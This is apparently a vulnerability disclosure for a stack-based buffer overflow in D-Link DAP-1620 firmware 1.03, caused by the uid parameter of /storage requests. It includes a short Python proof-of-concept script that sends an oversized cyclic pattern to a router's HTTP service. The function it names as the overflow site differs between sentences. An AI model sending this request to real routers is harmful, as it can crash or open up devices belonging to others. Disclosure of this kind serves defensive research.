| Firmware Name | Firmware Version | Download Link |
|---|---|---|
| DAP-1620 | DAP_1620_REVA_FIRMWARE_1.03 | https://legacyfiles.us.dlink.com/DAP-1620/REVA/Firmware/DAP-1620_REVA_FIRMWARE_1.03.B08.ZIP |
This vulnerability is triggered due to a stack overflow in the replace_special_char function, causing the function to return to an abnormal address.
The router receives an HTTP request, and the http_request_parse function is called.
Within http_request_parse, the check_dws_cookie function is invoked at address 0x414BD0, which checks if the request path starts with /storage. If true, it proceeds.
The check_dws_cookie function processes HTTP requests and checks if the request path starts with "/storage". If it does, the function copies the uid parameter from the request into a 13-byte-size buffer uid_str without validating the length of the input. This can lead to a stack-based buffer overflow
import requests
from pwn import *
ip = "172.17.0.3"
port = 80
url = f"http://{ip}:{port}/storage?uid={cyclic(100).decode('utf-8')}?"
print(requests.get(url).text)
The vulnerability was discovered by Professor Wei Zhou's team (IoTS&P Lab) from the School of Cyber Science and Engineering at Huazhong University of Science and Technology.